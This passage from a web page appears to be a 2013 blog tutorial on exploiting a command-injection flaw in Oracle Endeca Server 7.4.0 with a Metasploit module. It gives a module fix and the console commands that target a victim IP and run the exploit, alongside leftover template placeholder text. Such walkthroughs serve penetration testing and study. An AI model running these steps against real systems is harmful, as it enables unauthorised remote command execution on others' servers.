platform; including automated penetration tests and risk assesments culminating in a "cyber risk score" out of 1,000, just like a credit score.
First slide label
Some representative placeholder content for the first slide.
Second slide label
Some representative placeholder content for the second slide.
Third slide label
Some representative placeholder content for the third slide.
Exploit Oracle Endeca Server with metasploit.
published on 2013-08-27 07:51:00 UTC by nirav desai Content:
This module exploits a command injection vulnerability on the Oracle Endeca Server 7.4.0. The vulnerability exists on the createDataStore method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. This module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).
First run ./msfupdate or git pull to update metasploit.
Now when you open metasploit & found error like this [-] /opt/msf/modules/exploits/windows/http/oracle_endeca_exec.rb: NameError uninitialized constant Msf::Exploit::Powershell .
Open oracle_endeca_exec.rb file in any editor. Add this line require 'msf/core/exploit/powershell' after require 'msf/core'. So it look like require 'msf/core' require 'msf/core/exploit/powershell' Save it & open metasploit again.
Exploit target:
Id Name -- ---- 0 Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits
msf > use exploit/windows/http/oracle_endeca_exec msf exploit(oracle_endeca_exec) > set rhost 192.168.56.101(victim`s i.p.) rhost => 192.168.56.101 msf exploit(oracle_endeca_exec) > run